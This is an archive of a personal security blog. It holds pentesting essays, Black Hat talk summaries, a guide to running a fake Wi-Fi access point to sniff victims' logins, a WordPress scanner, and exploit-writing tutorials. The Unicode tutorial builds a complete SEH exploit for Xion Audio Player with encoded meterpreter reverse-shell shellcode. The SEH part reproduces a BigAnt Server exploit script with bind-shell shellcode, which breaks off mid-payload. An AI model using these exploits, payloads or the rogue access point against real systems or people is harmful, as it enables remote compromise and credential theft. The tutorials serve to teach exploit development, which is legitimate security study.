jump to navigation

Security in 2012 June 30, 2012

Posted by michelemanzotti in Security.
Tags: , ,
add a comment

Recently I’ve been involved in an internal penetration test for a large organization and I would like to draw some considerations from this experience.

We all agree that a system 100% immunes from any kind of attack is an utopia and it doesn’t exist a single standard solution to follow. Also getting in the security business is quite difficult. Both software and hardware companies offer their custom solutions which are able to fix any issues and suit any customer needs. They promote their products with aim of selling as much as possible and attempt to achieve the leadership in the sector. The positive effect from the customer point of view is that the price is low. But most often they don’t realize the consequence of this mechanism.

Upon achieving the leadership in the sector these companies have enough market power to claw money back by selling additional or extra services such as training, software updates and so on. Moreover a big advantage of these companies is the time. Especially in IT field where software, hardware and skills became obsolete very quickly. Thus it’s not a surprise finding in large organizations that use software, web applications and network services out-of-date.

In this context a single update of the software from current version to the latest could be intolerably expensive for the budgets of the organizations and therefore very often they prefer leaving the systems as they are. Also migrating to another vendor is definitely expensive in terms of internal personnel training and return of money invested. So what’s the solution?

Most organizations choose to add an extra security layer such as WAF, IDS, IPS, Firewall and so on in order to protect their system without changing their infrastructure. Although these solutions would seem easy to implement and they are quite efficient, actually they require specific skills to work properly and make the system safety. Moreover again these solutions could become quickly obsolete since the technology changes or systems of the organizations change.

The point is that there isn’t a final stage where an organization could be considered secure, and therefore there isn’t a specific product which is able to make the organization secure. The key is that only through manual cyclic security testing it’s possible identifying and then mitigating the risks that the organization may expose.

Advertisements

Back from Black Hat March 18, 2012

Posted by michelemanzotti in manzotti.eu, Security.
Tags: , , , ,
add a comment

I’m just back from the Black Hat Europe 2012. It was a great experience in a beautiful atmosphere. All talks were interesting for some reason however I found the presentations below (not in a specific order) really exciting.

CANAPE: Bytes Your Bits
Michael Jordon – James Forshaw

Testing and exploiting binary network protocols can be both complex and time consuming. More often than not, custom software needs to be developed to proxy, parse and manipulate the traffic. CANAPE is a new Windows tool we are releasing at Blackhat which takes the existing paradigm of Web Application testing tools (such as CAT, Burp or Fiddler) and applies that to any network protocol. CANAPE provides a user interface that facilitates the capture and replaying of binary network traffic, whilst providing a framework to develop parsers and fuzzers.

This presentation will follow a worked example of using CANAPE to analyse the Citrix ICA binary protocol, allowing the discovery of a heap corruption bug that can be used to gain remote code execution on Citrix clients.

Ling Chuan Lee – Chan Lee Yee

There are different types of font available within Windows and two groups of categories exist: GDI fonts and Device fonts. This talk will cover the GDI TrueType & GDI Bitmap fonts only on Windows platform.

In GDI, one typically to create font is filling in a LOGFONT Structure and then calling CreateFontIndirect which returns a font handle. As expect from the name, a LOGFONT structure is a logical font, if the user draw some text using that font handle, GDI will look for a matching physical font to draw the text. If it doesn’t find any match font name, it will use some other font.

The resulting outcome is that the font fuzzer is working at the lower level through physical font API’s provided by the GDI itself. For instance, API functions GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. Font fuzzer in this talk is aim to trigger the font vulnerabilities published in internet, two vulnerability in Windows Kernel MS11-077 and MS11-087 in handling crafted font will be discussed in this talk.

Alexey Sintsov

In the talk an overview of some ways to break Lotus through the Domino Controller (includes 0day bug) will be presented.

Mariano Nunez Di Croce

Global Fortune 1000 companies, large governmental organizations and defense entities have something in common: they rely on SAP platforms to run their business-critical processes and information. In this scenario, cyber-criminals looking to perform espionage, sabotage or financial fraud attacks know that these systems are keeping the business crown jewels.

But, how difficult is for them to break into an SAP system today? Are we properly protecting the business information or are we exposed?

Five years ago, we were invited to hold the first public presentation on real-world cyber-threats to SAP systems at BlackHat Europe 2007. Since then, we have performed specialized Penetration Tests against the SAP platforms of several of the largest organizations of the world, enabling us to get an educated answer to those questions.

Join us in this new presentation to learn:

How a cyber-attacker may break into an SAP system, completely anonymously.
Which are the Top-10 technical vulnerabilities found in real-world SAP implementations.
How protected are SAP systems from attacks over the Internet and internal networks.
How feasible it is to detect attacks in real-time and/or forensic investigations.
Which are the most effective measures to secure this business-critical platform.

This presentation will feature live demonstrations of attacks, war stories and statistics from real-world assessments.

Ben Williams

After a thorough examination of a number of common Security Gateway products over the past few months I have determined that Security Gateway Web User Interfaces are often vulnerable to security flaws, which could enable an attacker to gain control of the UI, bypass controls within the application, and in many cases control the underlying operating system.

Based on this research I have reported over 30 vulnerabilities, complete with proof-of-concept exploits to the vendors of these products.

This presentation will discuss vulnerabilities common across these products, weaknesses in product design, and some interesting attack vectors where external attackers can exploit Security Gateways via the UI, even where the attacker has no direct access to the UI.

Enno Rey – Daniel Mende

Modern “Enterprise” VoIP solutions are complex beasts. They usually encompass application servers (e.g. for mailboxes and to provide CTI functions), “infrastructure systems” for authentication or crypto stuff and “intelligent” phones.

In the end of the days the inherent complexity means that – while “traditional” VoIP attacks (like re-directing, sniffing and reconstructing calls) might no longer work – we’ve been able to severely compromise any enterprise VoIP environment we’ve pentested in the last twelve months. Based on a number of warstories, in this talk we’ll first lay out the relevant attack vectors and the protocol or device level vulnerabilities enabling those.

We will then focus on Cisco’s Unified Communications solution that seemingly disposes of a mature, certificate based crypto framework protecting both the signaling and the media transport. Well, seemingly. When closely inspecting the relevant parts and messages, it turns out that at some point all the key material can be replaced by attacker chosen keys. Which effectively means that we’re down to cleartext-like attacks again…

For the first time we’ll publicly provide a detailed technical explanation of the underlying vulnerabilities, show a live demo sniffing calls in a presumably fully encrypted environment and – of course 😉 – release a tool automating a number of steps of the complex overall attack. A discussion of potential mitigating controls, both on a technical and on the provisioning process level, completes the talk.

Sumit Siddharth – Tom Forbes

The presentation will discuss the vulnerability XPATH Injection in depth and we will cover advanced exploitation techniques. We will talk about xpath 2.0 and how an attacker can not just obtain the XML document but also obtain files outside the current document. We will discuss how to exploit vulnerabilities blindly and the case when the application does not reveal anything (ie. compare this to a time based sql injection). Exfiltrating data over out of bound channel such as HTTP, DNS will also be discussed followed by some real life examples of the vulnerability found in the wild. Finally we will release an open-source tool to automate exploiting this vulnerability with all advanced exploitation features built in.

Antonios Atlasis

IP fragmentation attacks is not a new issue. There are many publications regarding their exploitation for various purposes, including, but not limited to, OS fingerprinting, IDS/IPS insertion/evasion, firewall evasion and even remote code execution. The adoption of the new IP version, IPv6, has opened new potential exploitation fields to the attackers and pen testers. In this paper, it will be examined whether fragmentation issues still remain in IPv6 implementation of some of the most popular Operating Systems and whether they can also be used for the aforementioned purposes. To this end, several fragmentation attacks will be presented and their impact will be examined. As it will be shown, most of the popular OS, such as Windows, Linux and OpenBSD are susceptible to such attacks. In each case, the corresponding proof of concept code is provided. As it will be explained, such attacks, under specific circumstances can lead to OS fingerprinting, IDS insertion/evasion and firewalls evasions. Finally, these tests will also show which OS appears to be the most immune to IPv6 fragmentation attacks.

All talks are here.

Fake AP in 2 seconds December 30, 2011

Posted by michelemanzotti in manzotti.eu, Security, Windows.
Tags:
add a comment

Making an fake access point in Windows 7 it’s now really simple. Thanks to the new Wireless Hosted Networks technology introduced on Windows 7 and Windows Server 2008 R2 is possible to share an Internet connection from both a LAN and WIFI interface.

First off we need to create a new Wifi (Mini Adapter) interface, ssid and key. Since we can’t create a fake access point without authentication a good strategy is to put the key on ssid so people can connect to it:

C:windowssystem32>netsh wlan set hostednetwork mode=allow ssid="FreeWifi Key:12345678" key=12345678
The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.

Then we need to select the interface whence we would like to share our Internet connection. To do that you should go to Control Panel -> Network and Internet -> Network Connections, right click on the WIFI or LAN interface, properties and select the second Wifi Network Connection created right before. For this example I used the LAN interface as in the following picture.

Finally, we need to turn on the new Wifi:

C:windowssystem32>netsh wlan start hostednetwork
The hosted network started.

and that’s it! Let’s wait…

Now to see if a victim is connected to our fake access point we need the following command:

C:windowssystem32>netsh wlan show hostednetwork

Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "FreeWifi Key:12345678"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : ac:81:12:6f:eb:46
    Radio type             : 802.11b
    Channel                : 11
    Number of clients      : 1
        xx:xx:xx:xx:xx:xx        Authenticated

Obviously since we control the network we can sniff the traffic and all unencrypted traffic will be visible as shown in the following HTTP WordPress authentication:

Have fun.

Wpmap March 17, 2011

Posted by michelemanzotti in Tools.
Tags: , ,
1 comment so far

Today 17 March in Italy is national holiday so I have spent my spare time to write a little tool: wpmap.py

As you can image, wpmap is a tool to discover the most installed plugins on WordPress platform. It could be useful when during a penetration testing you have time to download the plugin source code and find some issues.

Menu:

$ python wpmap.py
Simple WordPress scanner to enumerate installed plugins   by Michele `m7x` Manzotti
Version 1.0   Plugins: 104   EDB-ID: 2011-01-08
Usage: wpmap.py --site 

Options:
  -h, --help            show this help message and exit
  -s SITE, --site=SITE  WordPress site
  -d DIRECTORY, --directoy=DIRECTORY
                        Subdirectory WordPress site
  -e, --exploit         Show exploit-db ID [default: False]
  -v, --verbose         Verbose mode[default: False]

Some screenshots:

with “-e” option:

Download:

svn co https://wpmap.svn.sourceforge.net/svnroot/wpmap wpmap

Happy hacking 🙂

Tutorial write an exploit part 4 Unicode November 29, 2010

Posted by michelemanzotti in manzotti.eu, Tutorial.
2 comments


– INTRODUCTION
– OVERWRITE IN UNICODE COMPATIBLE
– SHELLCODE
– VENIETAN CODE
– JUMP EXAMPLE
– SEH EXAMPLE

INTRODUCTION
When you are looking for a vulnerability in an application it could be possible that after running the fuzzer eip or seh shows a strange and different address 0x00410041 from the expected sequence of “A” 0x41414141.

Actually if you control better the two addresses you can immediately realize a correlation: two zeros “00” have been added among “A” bytes.
So, since the application was developed with a different encoding compared to the traditional ASCII: the Unicode, it needs to use different techniques from those described so far in order to write a working exploit.

However, even if the application has been written in Unicode the general idea to make a jump on the shellcode when you owned the eip it’s still the same. The techniques described in the previous tutorials would be fine only if the addresses which will be crafted are Unicode compatible.

OVERWRITE IN UNICODE COMPATIBLE
The main problem in this scenario is not to be able to use any available address but unicode compatible only. Indeed, It’s essential to use addresses which still work when they are converted in Unicode. For example, when you write an address as 0xAABB it will be encoded in 0x00AA00BB and it’s essential that it’s still valid. Moreover, it’s not true that any byte will be translated in Unicode by adding a prefix of null byte 00 to original byte. In fact, for byte from 0x00 and 0x7f a null byte will be added instead of byte > 7f they will be translated in a total different way. In this scenario finding addresses which are Unicode compliant and responsive to our needs it’s difficult enough, but here is where the game gets interesting!

Let’s assume that you have found an address Unicode compatible which meets our need: it has two bytes < 7f and so the encoding doesn’t envolve any change except for the null byte. Moreover let’s assume that address translated in Unicode points to a jump/call instruction to end up our shellcode. In addition it’s essential the jump/call will not cause any change in the stack and in the registers so our exploit takes effects. The same thing happens in the case of SEH: we have to overwrite the nseh and seh address with Unicode addresses compatibles which points to ppr instruction and then a short jump instrution to reach our shellcode.

We will see later how you can quickly find those addresses Unicode compatible.

SHELLCODE
Now let’s concentrate to write a shellcode and let’s assume to be in the first memory location of shellcode. Obviously you can not put the shellcode as Metasploit creates it because then it will accordingly be encoded in Unicode and then it will not work. So you need to write shellcode compatible with Unicode so that the encoding process does not alter the shellocode and is properly executed. To do this there are several techniques. The main ones are two. Both are made by changing the code in-line and then running the shellcode reproduced. These techniques require only one of the registers to point at the beginning of the decoder + shellcode, and the original shellcode will be reassembled in place.

1) alpha2 (SkyLined) is a tool which allows us to encode the shellcode in Unicode compatible:

msfpayload windows/meterpreter/reverse_tcp R > /pentest/exploits/runcalc.raw
alpha2 eax --unicode --uppercase < /pentest/exploits/runcalc.raw

2) Metasploit:

msfpayload windows/meterpreter/reverse_tcp R | msfencode -e x86/alpha_mixed -t raw | msfencode -e x86/unicode_upper BufferRegister=EAX -t perl

VENETIAN CODE
However to run the shellcode you need to reach it in other words the decoder needs to have a register that points at itself. To do this you use a technique called venetian code.

Let’s assume that you want to put ebp+300 bytes into eax then make a jump to eax because the shellcode is right in that address. So it’s necessary to write some instructions in assembly as you are in an exploit ASCII environment and then apply the venetian shellcode technique to be unicode compatible.

Assembly instructions to make a ebp eax +300 in eax and make a jump to eax are:

push ebp            ; put the address at ebp on the stack
pop eax             ; get address of ebp back from the stack and put it in eax
add eax,11001400    ; add 11001400 to eax
sub eax,11001100    ; subtract 11001100 from eax. Result = eax+300

push    eax
ret

That translate in opcode are:

55              push    ebp
58              pop     eax
0500140011      add     eax,offset XXXX+0x1400 (11001400)
2d00110011      sub     eax,offset XXXX+0x1100 (11001100)

50    ;push    eax
c3    ;ret

Writing in venetian code means to add further instructions so that the null bytes added during the encoding phase aren’t going to alter the stack/register and they are going to be as plain nops:

00 6E 00:add byte ptr [esi],ch
00 6F 00:add byte ptr [edi],ch
00 70 00:add byte ptr [eax],dh
00 71 00:add byte ptr [ecx],dh
00 72 00:add byte ptr [edx],dh
00 73 00:add byte ptr [ebx],dh

Then if you add the byte x6e in Unicode it will be x006e00 which will not cause any kind of damage to the stack/registers.

There are some further instructions that would work as well (62, 6d, and so on).

So the jump will be:

my $align="x55";                #push ebp
$align=$align."x6e";            #align
$align=$align."x58";            #pop eax
$align=$align."x6e";            #align
$align=$align."x05x14x11";    #add eax,0x11001400
$align=$align."x6e";            #align
$align=$align."x2dx11x11";    #sub eax,0x11001100
$align=$align."x6e";            #align

my $jump = "x50";  #push eax
$jump=$jump."x6d"; #nop/align
$jump=$jump."xc3"; #ret

However, even if you add 100 bytes to eax register unfortunately the shellcode will not be found after exactly 100 bytes.
So you need to modify one of the register and use some padding to put the shellcode exactly where it needs to be. In the end when the jump is made the eax points at the decoder (of the shellcode).

We will see better with the SEH example.

JUMP EXAMPLE
Let’s assume that you have found an address that will make the jump (to esp for example). Let’s assume that the address is 0x005E0018. This address does not contain characters that have a hex value > 7f. So the address should be fine.
So instead of overwriting EIP with pack(‘V’,0x005E0018), you have to overwrite EIP with 5E 18, because you are in Unicode environment. Unicode adds null bytes in front of 5E, and between 5E and 18, so EIP will be overwritten with 005e0018:

my $junk="A" x 500;
my $ret="x18x5e";
my $payload=$junk.$ret;

Now you have to calculate the offset in the same way of the tutorial 1 and overwrite the eip with the address which points to the jump. In the end you have to write shellcode in Unicode compatible.

SEH EXAMPLE
To write an Unicode exploit compatible under Win7 which exploits the SEH technique that we have seen in tutorial 3, we’ll use Xion Audio Player vers. 1.0 build 121, a simple music player.

As first step you check that the tool after the bof allows you to exploit the SEH technique. Let’s attach the application to Ollydbg or Immunity Debbuger and run the binary. Then right-click on the gui, choose “playlist” and go to “File” – “Load Playlist” and load the file generated by the following script:

my $crash = "A"x5000;
open(myfile,'>DragonR.m3u');
print myfile $crash;
print "[+] DragonR.m3u Createdn";

After that the application is crashed you check the SEH address on “View” – “SEH chain”:

The address is 00410041 and it means that the application is Unicode type:

Now as in a normal exploit you have to calculate the offset. Let’s generate the offset with Metasploit script and you insert it the code. After that we leave the application to crash and you check under the debugger what is happened:

my $crash = "Aa0Aa1Aa2Aa...";
open(myfile,'>DragonR2.m3u');
print myfile $crash;
print "[+] DragonR.m3u Createdn";

So with Ollydbg you go to “View SEH” and copy the address 0012F254:

Dopo andiamo clickiamo su “Go to expression”, incolliamo l’indirizzo 0012F254 appena trovato, e controlliamo il dump ( tasto destro “Follow in dump”):

After that you click on “Go expression” and paste the address just found and check the dump (right click and “Follow in dump”):

Since the Unicode adds “00” and we are in little endian environment, in order to calcUlate the offset you need to delete the “00” and read the address on the contrary 0x69413069. So the offset will be of 241 bytes (in my case):

root@bt:~# pattern_offset 0x69413069 5000
241

In order to have a verification of our calculus we can immediately overwrite 241 bytes the seh with “CC” and the nseh with “BB”:

my $totalsize=5000;
my $junk = "A" x 241;
my $nseh="BB";
my $seh="CC";
my $morestuff="D" x (5000-length($junk.$nseh.$seh));

$payload=$junk.$nseh.$seh.$morestuff;

open(myfile,'>corelantest.m3u');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytesn";

Let’s run the application again and check that our calculus about offset are right both into dump:

and into stack:

Great! The nseh has been overwritten by the “B” and the seh by “C” just like we wanted. Now just like in an exploit seh type you need to overwrite a location which points to a pop pop ret. As we are in Unicode environment this address must be Unicode compatible. To do this you’ll use a script for Immunity Debbuger called pvefindaddr
After you have installed the plugin let’s open Immunity Debugger and load xion.exe in the debugger. Run the application, go to the playlist dialog, select “File”, “Load Playlist” but don’t load the playlist file. Then in the console of Immunity Debugger you run the plugin:

!pvefindaddr p2

Pvefindaddr will write in a file, ppr2.txt, all pop pop ret Unicode compatible:

Now you can replace the “CC” in the exploit with the ppr unicode compatible address 00450015 just found and check with a breakpoint if the application reaches that address or not:

my $totalsize=5000;
my $junk = "A" x 241;
my $nseh="x41x41";  #nseh -> 00410041
my $seh="x15x45";   #put 00450015 in SE Handler
my $morestuff="D" x (5000-length($junk.$nseh.$seh));

$payload=$junk.$nseh.$seh.$morestuff;

open(myfile,'>unicode2.m3u');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytesn";

If you run the application you notice that the pop pop ret is reached:

After that you can see that the eip points to the nseh:

Then if you check the dump of 0012F254 address you notice that the shellcode “D” is immediately next the seh and nseh address:

So you need a way to reach the shellcode. In a common seh exploit a short jump “xebx06x90x90” is sufficient but you are in Unicode so you need some safe instructions popad + nop align (such as NOPs), that will allow you to align the null bytes without doing any harm to the registers or instructions:

my $totalsize=5000;
my $junk = "A" x 241;
my $nseh="x61x62";  #nseh -> popad + nop/align
my $seh="x15x45";   #put 00450015 in SE Handler
my $morestuff="D" x (5000-length($junk.$nseh.$seh));

$payload=$junk.$nseh.$seh.$morestuff;

open(myfile,'>unicode4.m3u');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytesn";

First you set a breakpoint to 00450015 and check what happens:

As you can see from the next picture you have reached the target because you have overwritten the SE structure, crafted the eip with a pop pop ret and simulated a short jump with popad instruction:

Now the challenge is to write a working exploit. You can not put the encoded shellcode here, because the decoder needs to have a register that points at itself. If you look at the current register values you can see there are a lot of registers that point almost at the current location but none of them points directly at the current location 0012F25D:

So you need to modify one of the registers, and use some padding to put the shellcode exactly where it needs to be.

But before you have to generate a shellcode which uses the register eax with alpha2.
What you need to do is to point eax at the location that points at the first byte of our decoder (encoded shellcode) and then jump to eax:

root@bt:/pentest/exploits/encoder# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 R > reverse_tcp.raw
root@bt:/pentest/exploits/encoder# ./alpha2 eax --unicode --uppercase < reverse_tcp.raw
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLZHDIM0KPKP304IYUP19BRDTK0RNP4K1BLL4K22N4TKBRNHLOVWOZO601KONQWPVLOLQQCLKRNLO091HOLMKQXGK2ZP1BQG4KQBLPTKOROLKQJ0TKOP48DEGPT4OZKQHPPPTKQ8MHTKR8MPKQ8SK3OLPIDKNTTKKQ8VP1KOP17PFLY18OLMKQXGNXK03EJTKSSMKHOKSMMTD59RPX4KB8O4M1J336TKLLPK4KPXMLKQZ3TKKT4KM1XPTIOTMTMTQKQKQQQIQJR1KOYPR8QOPZDKMBZKCVQMQXOCNRKPM0QXRW3COBQOPTQXPLCGO6M7KOXUVXF0KQKPM0O9WTPTPP38NISP2KM0KO9EPP20B020OPPPOPPPQX9ZLOIO9PKOYE672JM5BH7PUXKQLFBHLBM0LQ1LU9K6QZLPPVR7QXTYEU44S1KO9ETEWPBTLLKOPNLHRUZL2HZP7E72PVKOXUQZKPQZKTPVPWQXLBHYWXQOKOJ54KNVRJOPS8M0LPM0KPQFQZM01XPX5T1C9UKOXUDSPSBJKP0VR31GQXM2YI8HQOKO8UKQI3MY96U5KFBUJLGSKZA

Later you have a look to the registers you can put ebp in eax and then add a small number of bytes so you jump over the code that is needed to point eax to the decoder and jump to it.

So the idea is to put ebp in eax and add 100 bytes so that the eax will point to 0012F354:
Current EBP = 0012F254 + 100 Bytes = 0012F354:
In this way the ebp will point to D:

In order to put ebp+100 into eax, and to jump to eax, you need the following code:

push ebp
pop eax
add eax,0x11001400
sub eax,0x11001300

push eax
ret

After applying the venetian shellcode technique the code will be :

my $preparestuff="D";   #we need the first D
$preparestuff=$preparestuff."x6e";  #nop/align
$preparestuff=$preparestuff."x55";  #push ebp
$preparestuff=$preparestuff."x6e";  #nop/align
$preparestuff=$preparestuff."x58";  #pop eax
$preparestuff=$preparestuff."x6e";  #pop/align
$preparestuff=$preparestuff."x05x14x11";   #add eax,0x11001400
$preparestuff=$preparestuff."x6e";  #pop/align
$preparestuff=$preparestuff."x2dx13x11";   #sub eax,0x11001300
$preparestuff=$preparestuff."x6e";  #pop/align

So the jump will be:

my $totalsize=5000;
my $junk = "A" x 241;
my $nseh="x61x62";  #nseh -> popad + nop/align
my $seh="x15x45";   #put 00450015 in SE Handler
my $preparestuff="D";   #we need the first D

#put ebp in eax and then add 100 bytes
$preparestuff=$preparestuff."x6e";  #nop/align
$preparestuff=$preparestuff."x55";  #push ebp
$preparestuff=$preparestuff."x6e";  #nop/align
$preparestuff=$preparestuff."x58";  #pop eax
$preparestuff=$preparestuff."x6e";  #pop/align
$preparestuff=$preparestuff."x05x14x11";   #add eax,0x11001400
$preparestuff=$preparestuff."x6e";  #pop/align
$preparestuff=$preparestuff."x2dx13x11";   #sub eax,0x11001300
$preparestuff=$preparestuff."x6e";  #pop/align

my $jump = "x50";  #push eax
$jump=$jump."x6d"; #nop/align
$jump=$jump."xc3"; #ret

my $morestuff="D" x (5000-length($junk.$nseh.$seh.$preparestuff.$jump));

$payload=$junk.$nseh.$seh.$preparestuff.$jump.$morestuff;

open(myfile,'>unicode5.m3u');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytesn";

Let’s check with the dubugger what happens.
After that you have to run the application, check the value of eax before the jump:

The eax points to 0012F354 address where there are “D” and where it will be the beginning of the shellcode. So it is necessary to calculate the right offset to add the right padding.

Therefore:
0012F354 – 0012f27c = 0xD8 = 216 / 2 = 108 – 1 = 107

216 / 2 because the Unicode adds the null bytes “00”, one for each byte added. So you need to divide by half. -1 because there is a “D” at the beginning of venetian code used to align the code. So the final exploit will be:

my $totalsize=5000;
my $junk = "A" x 241;
my $nseh="x61x62";  #nseh -> popad + nop/align
my $seh="x15x45";   #put 00450015 in SE Handler
my $preparestuff="D";   #we need the first D

#put ebp in eax and then add 100 bytes
$preparestuff=$preparestuff."x6e";  #nop/align
$preparestuff=$preparestuff."x55";  #push ebp
$preparestuff=$preparestuff."x6e";  #nop/align
$preparestuff=$preparestuff."x58";  #pop eax
$preparestuff=$preparestuff."x6e";  #pop/align
$preparestuff=$preparestuff."x05x14x11";   #add eax,0x11001400
$preparestuff=$preparestuff."x6e";  #pop/align
$preparestuff=$preparestuff."x2dx13x11";   #sub eax,0x11001300
$preparestuff=$preparestuff."x6e";  #pop/align

my $jump = "x50";  #push eax
$jump=$jump."x6d"; #nop/align
$jump=$jump."xc3"; #ret

my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPM01PU99UNQ8RS4DKPRNP4K0RLLTKR2N4TK2RMXLOWGPJMVP1KOP17PFLOL1Q3LLBNLMPY1XOLMM17WK2ZPR2R7DKR2LPDKOROLKQHPDKQ0SHU57PRTOZKQXPPPDKQ8LXTKPXO0M1J3K3OLQ94KNTTKKQZ6NQKONQ7PVLWQHOLMKQGW08YP2UJTM3SML8OKSMMTBUK2QHTKPXMTKQJ31V4KLL0KDK0XMLKQXSDKM4TKKQXP3Y14O4O4QKQKS11IQJB1KOK0PXQOQJDKN2JK561M38NS02M0KPQXRWSC02QOPT1X0LRWMVLGKOHU7H4PM1M0KPMYXDB40PQXMYSP2KKPKOJ50PPPB0PPOPB0OP0PS89ZLO9O9PKO8UUG2JKUS86LN0LO3SQXKRM0LQ1LU9YV2JLPPV0WQX69W5T4QQKOHU3UWPT4LLKOPNM845ZLC8L0H5VB1FKO9E2JM0BJKTQFQGC8KR8YWXQOKOIETKNVQZ101XM0LPKPKP26RJKP2HQH6DQCYUKOHUUCPS2JKPPVR3PW1XM2J9WXQOKOXUM17SMYY655KFD5ZLWSKZA";
my $morestuff= "D" x 107;
my $morestuffagain="E" x (5000-length($junk.$nseh.$seh.$preparestuff.$jump.$shellcode.$morestuff));

$payload=$junk.$nseh.$seh.$preparestuff.$jump.$morestuff.$shellcode.$morestuffagain;

open(myfile,'>unicode6.m3u');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytesn";

Pwned!

Here there is a video demonstration:

See you
Michele `m7x` Manzotti

Tutorial write an exploit part 3 SEH November 6, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , ,
add a comment

In the previous tutorial we have seen some technique of buffer overflow, in most cases with the aim to overwrite the EIP with a jump esp opcode. Now let’s see how to exploit a buffer overflow through the technique of SEH.
SEH, Structured Exception Handler, it’s a component for catching and handling exceptions. Basically exception handlers are used by programmers when the program reaches a point of no return, such as a BOF. At this point the exception handler loads in the memory blocks of code and when it finds one that resolves the problem, then the program returns to run correctly.
The exploit takes advantage of this exception handler that loads the exceptions sequentially and at the beginning of each block exception there is the address that points to the next exception NEXT SEH.
So if the current block exception does not solve the problem, the program reads the NEXT SEH, that is the address that points to the next exception, and executes the block in that exception, until the end of all exceptions. If it finds one that can solve the problem, obviously the program ends.

Not all the programs with SEH are vulnerable, but only those where you can overwrite the SEH NEXT, the address that points to the next except, with arbitrary memory location. To check whether the program uses a vulnerable SEH OllyDbg is sufficient to load the plugin OllySSEH.

If we can see dlls where the SEH is vulnerable then we could overwrite the SEH address with a pop pop ret opcode so that program flow is directed to the NEXT SEH, which will contain a jump to the shellcode .

First of all we look for an application vulnerable to SEH, e.g. BigAnt Server, as shown by the following exploits tested on a Windows XP SP3 and then we try to run on Windows 7:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51"
"x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37"
"x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49"
"x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42"
"x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48"
"x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38"
"x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49"
"x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43"
"x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51"
"x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36"
"x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42"
"x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51"
"x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a"
"x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50"
"x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48"
"x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53"
"x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46"
"x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51"
"x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39"
"x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42"
